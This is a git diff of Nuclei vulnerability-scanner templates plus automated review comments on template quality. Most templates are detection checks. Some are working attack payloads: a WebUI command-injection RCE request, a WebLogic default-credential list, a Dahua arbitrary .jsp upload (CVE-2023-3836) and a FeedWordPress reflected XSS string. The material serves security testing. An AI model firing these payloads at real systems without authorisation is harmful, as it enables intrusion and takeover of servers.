@@ -1,28 +0,0 @@ -id: webeditors -info: - name: Web Editors - author: princechaddha,bernardofsr - severity: info - tags: panel,webeditors -requests: - - method: GET - path: - - "{{BaseURL}}/fckeditor/_samples/default.html" - - "{{BaseURL}}/fckeditor/editor/filemanager/connectors/uploadtest.html" - - "{{BaseURL}}/ckeditor/samples/" - - "{{BaseURL}}/editor/ckeditor/samples/" - - "{{BaseURL}}/ckeditor/samples/sample_posteddata.php" - - "{{BaseURL}}/editor/ckeditor/samples/sample_posteddata.php" - - "{{BaseURL}}/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" - - "{{BaseURL}}/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php" - - "{{BaseURL}}/ueditor/php/getRemoteImage.php" - matchers: - - type: word - words: - - "FCKeditor" - - "<title>CKEditor Samples" - - "http://ckeditor.com" - - "Custom Uploader URL:" - - "init_spell()" - - "'tip':'" - condition: or diff --git a/poc/web/webflow-takeover-11131.yaml b/poc/web/webflow-takeover-11131.yaml deleted file mode 100644 index b1667b35dc..0000000000 --- a/poc/web/webflow-takeover-11131.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: webflow-takeover -info: - name: webflow takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - -

    The page you are looking for doesn't exist or has been moved.

    diff --git a/poc/web/webflow-takeover-11133.yaml b/poc/web/webflow-takeover-11133.yaml new file mode 100644 index 0000000000..3fd3180be6 --- /dev/null +++ b/poc/web/webflow-takeover-11133.yaml @@ -0,0 +1,15 @@ +id: webflow-takeover +info: + name: webflow takeover detection + author: pdcommunity + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + -

    The page you are looking for doesn't exist or has been moved.
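Review bot: webflow-takeover-11133.yaml reports `severity: high` from a single `word` matcher with no status or DNS condition, and the phrase it looks for (as far as it is readable in this view) is a generic not-found sentence. Any site that serves the same sentence would be flagged as a takeover candidate. I would add `matchers-condition: and` together with a second matcher that ties the response to the hosting provider, and add a `description:` stating that a hit still needs manual confirmation of the dangling DNS record before it is treated as a finding.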

    diff --git a/poc/web/webflow-takeover.yaml b/poc/web/webflow-takeover.yaml index 3fd3180be6..b1667b35dc 100644 --- a/poc/web/webflow-takeover.yaml +++ b/poc/web/webflow-takeover.yaml @@ -1,7 +1,7 @@ id: webflow-takeover info: name: webflow takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz diff --git a/poc/web/weblogic-iiop-detect-11148.yaml b/poc/web/weblogic-iiop-detect-11148.yaml index 1aae2ded85..bf7d91dfc6 100644 --- a/poc/web/weblogic-iiop-detect-11148.yaml +++ b/poc/web/weblogic-iiop-detect-11148.yaml @@ -1,20 +1,16 @@ id: weblogic-iiop-detect - info: name: Detect Weblogic IIOP Protocol author: F1tz severity: info description: Check IIOP protocol status. tags: network,weblogic - network: - inputs: - data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}" - host: - "{{Hostname}}" read-size: 1024 - matchers-condition: and matchers: - type: word diff --git a/poc/web/weblogic-t3-detect-11151.yaml b/poc/web/weblogic-t3-detect-11151.yaml index b1a63e30be..fd503f75f3 100644 --- a/poc/web/weblogic-t3-detect-11151.yaml +++ b/poc/web/weblogic-t3-detect-11151.yaml @@ -1,7 +1,7 @@ id: weblogic-t3-detect info: name: Detect Weblogic T3 Protocol - author: F1tz + author: F1tz,milo2012,wdahlenb severity: info description: Check T3 protocol status. tags: network,weblogic @@ -15,3 +15,24 @@ network: - type: word words: - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" + - inputs: + - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + host: + - "tls://{{Hostname}}" + read-size: 1024 + matchers: + - type: word + words: + - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" 
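Review bot: The extractor regex `"HELO:(.*).false"` added in the second hunk of weblogic-t3-detect-11151.yaml leaves the dot before `false` unescaped, so it matches any character there instead of a literal dot. `- 'HELO:(.*)\.false'` (single-quoted so YAML keeps the backslash) pins the suffix and keeps the version in group 1; the regex is added twice, once per input, and both copies need the change. The new `tls://` input also hard-codes `PU:t3://us-l-breens:7001` in its payload, which looks like a host name left over from a captured handshake, and a short comment saying the value is a placeholder would save readers a search. The `network:` block opens above the hunk.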
diff --git a/poc/web/weblogic-t3-detect-11152.yaml b/poc/web/weblogic-t3-detect-11153.yaml similarity index 100% rename from poc/web/weblogic-t3-detect-11152.yaml rename to poc/web/weblogic-t3-detect-11153.yaml diff --git a/poc/web/weblogic-weak-login-11154.yaml b/poc/web/weblogic-weak-login-11154.yaml deleted file mode 100644 index 3cf788b3b9..0000000000 --- a/poc/web/weblogic-weak-login-11154.yaml +++ /dev/null @@ -1,68 +0,0 @@ -id: weblogic-weak-login - -info: - name: WebLogic Default Login - author: pdteam - description: WebLogic default login credentials were discovered. - severity: high - tags: default-login,weblogic - reference: - - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - -requests: - - raw: - - | - GET /console/ HTTP/1.1 - Host: {{Hostname}} - - - | - POST /console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8 - - attack: pitchfork - payloads: - username: - - weblogic - - weblogic - - weblogic - - weblogic - - weblogic - - admin - - admin - - system - - password: - - weblogic - - weblogic1 - - welcome1 - - Oracle@123 - - weblogic123 - - 12345678 - - security - - password - - stop-at-first-match: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/console/index.jsp" - - "ADMINCONSOLESESSION" - condition: and - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/web/weblogic-weak-login-11155.yaml b/poc/web/weblogic-weak-login-11155.yaml index 11d03f834a..454abb185f 100644 --- a/poc/web/weblogic-weak-login-11155.yaml +++ b/poc/web/weblogic-weak-login-11155.yaml 
@@ -1,18 +1,10 @@ id: weblogic-weak-login info: - name: WebLogic Default Login + name: WebLogic weak login author: pdteam - description: WebLogic default login credentials were discovered. severity: high tags: default-login,weblogic - reference: - - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password requests: - raw: - | @@ -57,5 +49,3 @@ requests: - type: status status: - 302 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/web/webmodule-ee-11162.yaml b/poc/web/webmodule-ee-11162.yaml new file mode 100644 index 0000000000..ab6ad7a796 --- /dev/null +++ b/poc/web/webmodule-ee-11162.yaml @@ -0,0 +1,19 @@ +id: webmodule-ee-detection +info: + name: Webmodule Detection + author: pussycat0x + severity: info + reference: https://www.exploit-db.com/ghdb/7001 + tags: webmodule-ee,tech +requests: + - method: GET + path: + - "{{BaseURL}}/webmodule-ee/login.seam" + matchers-condition: and + matchers: + - type: word + words: + - "Webmodule" + - type: status + status: + - 200 diff --git a/poc/web/webmodule-ee-11164.yaml b/poc/web/webmodule-ee-11164.yaml deleted file mode 100644 index b4aa17abf0..0000000000 --- a/poc/web/webmodule-ee-11164.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: webmodule-ee-detection - -info: - name: Webmodule Detection - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7001 - tags: webmodule-ee,tech - -requests: - - method: GET - path: - - "{{BaseURL}}/webmodule-ee/login.seam" - - matchers-condition: and - matchers: - - type: word - words: - - "Webmodule" - - type: status - status: - - 200 
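Review bot: The first hunk of `weblogic-weak-login-11155.yaml` removes the `description` and the whole `classification` block (CVSS vector, `cvss-score: 8.3`, `cwe-id: CWE-522`) from a `severity: high` template, so a finding no longer says what was found or which weakness class it maps to. Keeping `description: WebLogic default login credentials were discovered.` and `cwe-id: CWE-522` costs two lines and preserves the triage context. The same removal of description and classification is made in `poc/web/webview-javascript.yaml` and `poc/web/webview-universal-access.yaml` further down.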
diff --git a/poc/web/webmodule-ee-panel-11160.yaml b/poc/web/webmodule-ee-panel-11161.yaml similarity index 100% rename from poc/web/webmodule-ee-panel-11160.yaml rename to poc/web/webmodule-ee-panel-11161.yaml diff --git a/poc/web/webmodule-ee.yaml b/poc/web/webmodule-ee.yaml index ab6ad7a796..3851830e33 100644 --- a/poc/web/webmodule-ee.yaml +++ b/poc/web/webmodule-ee.yaml @@ -5,6 +5,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7001 tags: webmodule-ee,tech + requests: - method: GET path: @@ -14,6 +15,7 @@ requests: - type: word words: - "Webmodule" + - type: status status: - 200 diff --git a/poc/web/webtools-home.yaml b/poc/web/webtools-home.yaml index 86f88c2502..a82b0b1183 100644 --- a/poc/web/webtools-home.yaml +++ b/poc/web/webtools-home.yaml @@ -1,27 +1,20 @@ id: webtools-home - info: name: Webtools Home author: dhiyaneshDK severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Webtools" tags: iot - -http: + metadata: + shodan-query: 'http.title:"Webtools"' +requests: - method: GET path: - "{{BaseURL}}/wt2parser.cgi?home_en" - matchers-condition: and matchers: - type: word words: - 'WebTools | Home' - - type: status status: - 200 - -# digest: 4b0a00483046022100f3d6b75a7638a8769657a5da18f42513fd5adbe8220a9f58a13e6c00a144e09d02210089d21a4e51c19e50caab6f6e1dfa4465d9b6062bc1e341b31321780bbc40be4b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/webui-rce-11170.yaml b/poc/web/webui-rce-11170.yaml deleted file mode 100644 index 09b1d2e004..0000000000 --- a/poc/web/webui-rce-11170.yaml +++ /dev/null 
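Review bot: The `webtools-home.yaml` hunk moves the template from the `http:` key back to the older `requests:` key and deletes both `max-request: 1` and the trailing `# digest:` signature line, so the file becomes an unsigned copy in the earlier syntax. If the goal is to track upstream, keep `http:` and the digest as they were. If the downgrade is deliberate, a header comment such as `# unsigned local copy, older syntax kept on purpose` would record why. The same reversal appears in `poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml` and `poc/wordpress/wordpress-detect.yaml`.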
@@ -1,21 +0,0 @@ -id: webui-rce -info: - name: WebUI 1.5b6 RCE - author: pikpikcu - severity: critical - description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. - reference: https://www.exploit-db.com/exploits/36821 - tags: webui,rce -requests: - - method: GET - path: - - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' - matchers-condition: and - matchers: - - type: word - words: - - "c5b3d7397a90f42d222f7ed9408c0dc6" - part: body - - type: status - status: - - 200 diff --git a/poc/web/webui-rce-11174.yaml b/poc/web/webui-rce-11174.yaml new file mode 100644 index 0000000000..952c3225ff --- /dev/null +++ b/poc/web/webui-rce-11174.yaml @@ -0,0 +1,20 @@ +id: webui-rce +info: + name: WebUI 1.5b6 RCE + author: pikpikcu + severity: critical + reference: https://www.exploit-db.com/exploits/36821 + tags: webui,rce +requests: + - method: GET + path: + - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' + matchers-condition: and + matchers: + - type: word + words: + - "c5b3d7397a90f42d222f7ed9408c0dc6" + part: body + - type: status + status: + - 200 diff --git a/poc/web/webui-rce.yaml b/poc/web/webui-rce.yaml index 952c3225ff..09b1d2e004 100644 --- a/poc/web/webui-rce.yaml +++ b/poc/web/webui-rce.yaml @@ -3,6 +3,7 @@ info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical + description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. reference: https://www.exploit-db.com/exploits/36821 tags: webui,rce requests: diff --git a/poc/web/webview-addjavascript-interface-11175.yaml b/poc/web/webview-addjavascript-interface-11175.yaml index 06e26a26dd..49c7786cd6 100644 --- a/poc/web/webview-addjavascript-interface-11175.yaml 
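Review bot: The new file `poc/web/webui-rce-11174.yaml` reuses `id: webui-rce`, the id also carried by `poc/web/webui-rce.yaml` in the next section, so a run that loads the directory presumably reports two templates under one identifier and sends the same request twice. It is also added without the `description` line that `webui-rce.yaml` gains in this commit, although it is `severity: critical`. Either drop the numbered copy or give it the same description and a comment naming the authoritative file. `webmodule-ee-11162.yaml` and `webmodule-ee.yaml` share `id: webmodule-ee-detection` in the same way.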
+++ b/poc/web/webview-addjavascript-interface-11175.yaml @@ -1,16 +1,13 @@ id: webview-addjavascript-interface - info: name: Webview addJavascript Interface Usage author: gaurang severity: info tags: android,file - file: - extensions: - all - matchers: - type: word words: - - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" \ No newline at end of file + - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" diff --git a/poc/web/webview-addjavascript-interface-11177.yaml b/poc/web/webview-addjavascript-interface-11176.yaml similarity index 100% rename from poc/web/webview-addjavascript-interface-11177.yaml rename to poc/web/webview-addjavascript-interface-11176.yaml diff --git a/poc/web/webview-javascript.yaml b/poc/web/webview-javascript.yaml index 22692eba77..026d8c3ec9 100644 --- a/poc/web/webview-javascript.yaml +++ b/poc/web/webview-javascript.yaml @@ -1,14 +1,8 @@ id: webview-javascript-enabled - info: - name: WebView JavaScript - Detect + name: Webview JavaScript enabled author: gaurang severity: info - description: WebView Javascript enabling was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 tags: android,file,javascript file: - extensions: @@ -17,6 +11,3 @@ file: - type: word words: - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" - -# Enhanced by md on 2023/05/03 -# digest: 490a0046304402202cb44b3b176f00694b16cac7a61f5db343e65232d7dbb0e4c3f19815322ffa30022041f4229478a122c2b2f3b7878815a3391f9725e527b8eb7c18488d0c958b3324:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/webview-load-url-11180.yaml b/poc/web/webview-load-url-11180.yaml new file mode 100644 index 0000000000..a45be3958b --- /dev/null +++ b/poc/web/webview-load-url-11180.yaml 
@@ -0,0 +1,13 @@ +id: webview-load-url +info: + name: Webview loadUrl usage + author: gaurang + severity: info + tags: android,file +file: + - extensions: + - all + matchers: + - type: word + words: + - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" diff --git a/poc/web/webview-load-url-11182.yaml b/poc/web/webview-load-url-11182.yaml deleted file mode 100644 index c0e2a25607..0000000000 --- a/poc/web/webview-load-url-11182.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: webview-load-url -info: - name: Webview loadUrl usage - author: gaurang - severity: info -file: - - extensions: - - all - matchers: - - type: word - words: - - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" diff --git a/poc/web/webview-universal-access-11183.yaml b/poc/web/webview-universal-access-11183.yaml index 56fe5fb8ac..11b8a99339 100644 --- a/poc/web/webview-universal-access-11183.yaml +++ b/poc/web/webview-universal-access-11183.yaml @@ -1,16 +1,13 @@ id: webview-universal-access - info: name: Webview Universal Access enabled author: gaurang severity: medium tags: android,file - file: - extensions: - all - matchers: - type: word words: - - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" \ No newline at end of file + - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" diff --git a/poc/web/webview-universal-access.yaml b/poc/web/webview-universal-access.yaml index 2497ace769..56fe5fb8ac 100644 --- a/poc/web/webview-universal-access.yaml +++ b/poc/web/webview-universal-access.yaml 
@@ -1,22 +1,16 @@ id: webview-universal-access info: - name: Android WebView Universal Access - Detect + name: Webview Universal Access enabled author: gaurang severity: medium - description: Android WebView Universal Access enabling was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 tags: android,file + file: - extensions: - all + matchers: - type: word words: - - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" - -# Enhanced by md on 2023/05/03 -# digest: 4a0a00473045022100a47e2082fc66a04948c89867eea66d41624cf5a26a7e0e6faebecd5e18281a74022025ef3b1093b7cfa7eeb45aea5a30518577674355526f2621c96bde80d175642a:922c64590222798bb761d5b6d8e72950 + - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" \ No newline at end of file diff --git a/poc/web/xp-webcam.yaml b/poc/web/xp-webcam.yaml deleted file mode 100644 index f225f44ead..0000000000 --- a/poc/web/xp-webcam.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: xp-webcam -info: - name: XP Webcam Viewer Page - author: aashiq - severity: medium - description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body - tags: webcam,iot -requests: - - method: GET - path: - - "{{BaseURL}}/mobile.html" - matchers-condition: and - matchers: - - type: word - words: - - "webcams and ip cameras server for windows" - part: body - - type: word - words: - - "Please provide a valid username/password to access this server." - part: body - negative: true diff --git a/poc/web/zoho-webhook-token-11835.yaml b/poc/web/zoho-webhook-token-11835.yaml index 7dd146b904..f3aa557a4a 100644 --- a/poc/web/zoho-webhook-token-11835.yaml +++ b/poc/web/zoho-webhook-token-11835.yaml @@ -3,7 +3,7 @@ info: name: Zoho Webhook Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,zoho requests: - method: GET path: 
diff --git a/poc/wordpress/alfacgiapi-wordpress-256.yaml b/poc/wordpress/alfacgiapi-wordpress-256.yaml index 271a1c4865..69b0d39f88 100644 --- a/poc/wordpress/alfacgiapi-wordpress-256.yaml +++ b/poc/wordpress/alfacgiapi-wordpress-256.yaml @@ -1,32 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/wordpress/alfacgiapi-wordpress.yaml b/poc/wordpress/alfacgiapi-wordpress.yaml deleted file mode 100644 index f8d61143d9..0000000000 --- a/poc/wordpress/alfacgiapi-wordpress.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..d9ab862ef2 100644 --- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml 
@@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.89967 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100f2fe66aae8a7930c251558f40e6a8761a1a2f08dc61ceb26fdb620340e407485022100b09958027468fc3a2c2e0713cd534f24ffcb47ccdbdc4fe72a231113cc9f634f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/wordpress/easy-wp-smtp-listing-7156.yaml b/poc/wordpress/easy-wp-smtp-listing-7156.yaml new file mode 100644 index 0000000000..4e6298c0c5 --- /dev/null +++ b/poc/wordpress/easy-wp-smtp-listing-7156.yaml 
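Review bot: The rewritten template stores a `{{random_str}}.jsp` file on the target and reads it back from `/upload/emap/society_new/`, yet neither `description` nor `remediation` tells the operator that a file is left on every host that matches. The new description also stops mid-thought ("including/emap/devicePoint_addImgIco?.") and no longer states that the endpoint accepts arbitrary uploads, which the removed text did. I would state both, for example `Unauthenticated file upload via /emap/devicePoint_addImgIco; this check stores a marker file on the target that must be removed afterwards.` The file also sits under `poc/wordpress/` although it concerns a Dahua product, which makes path-based exclusion of intrusive checks harder.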
@@ -0,0 +1,19 @@ +id: easy-wp-smtp-listing +info: + name: SMTP WP Plugin Directory listing enabled + author: PR3R00T + severity: high + description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. + reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ + tags: wordpress,wp-plugin,smtp +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" + matchers: + - type: word + words: + - "debug" + - "log" + - "Index of" + condition: and diff --git a/poc/wordpress/easy-wp-smtp-listing-7157.yaml b/poc/wordpress/easy-wp-smtp-listing-7157.yaml deleted file mode 100644 index 64937eb924..0000000000 --- a/poc/wordpress/easy-wp-smtp-listing-7157.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: easy-wp-smtp-listing - -info: - name: SMTP WP Plugin Directory listing enabled - author: PR3R00T - severity: high - description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. - reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - tags: wordpress,wp-plugin,smtp - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" - matchers: - - type: word - words: - - "debug" - - "log" - - "Index of" - condition: and diff --git a/poc/wordpress/easy-wp-smtp-listing.yaml b/poc/wordpress/easy-wp-smtp-listing.yaml index 06955ae152..64937eb924 100644 --- a/poc/wordpress/easy-wp-smtp-listing.yaml +++ b/poc/wordpress/easy-wp-smtp-listing.yaml 
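Review bot: The only matcher in the new `easy-wp-smtp-listing-7156.yaml` requires the words `debug`, `log` and `Index of` anywhere in the response and has no status check, so a directory index or error page that happens to contain those common substrings is reported at `severity: high`. Adding a `type: status` matcher for `200` under `matchers-condition: and`, and matching the log file name rather than two generic words, would cut false positives. I believe the plugin's log file carries a `_debug_log.txt` suffix, which should be confirmed against the linked reference before it is used. The description also misspells `acccessible`.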
@@ -1,10 +1,13 @@ id: easy-wp-smtp-listing + info: name: SMTP WP Plugin Directory listing enabled author: PR3R00T severity: high + description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - tags: wordpress,wp-plugin + tags: wordpress,wp-plugin,smtp + requests: - method: GET path: diff --git a/poc/wordpress/feedwordpress-xss-7459.yaml b/poc/wordpress/feedwordpress-xss-7459.yaml new file mode 100644 index 0000000000..6aab768ed3 --- /dev/null +++ b/poc/wordpress/feedwordpress-xss-7459.yaml @@ -0,0 +1,35 @@ +id: feedwordpress-xss +info: + name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDk + severity: medium + description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter. + reference: https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 + tags: wordpress,wp-plugin,xss,feedwordpress,authenticated +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">" method="post">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml b/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml deleted file mode 100644 index 6f1dfbf9fe..0000000000 --- a/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml +++ /dev/null 
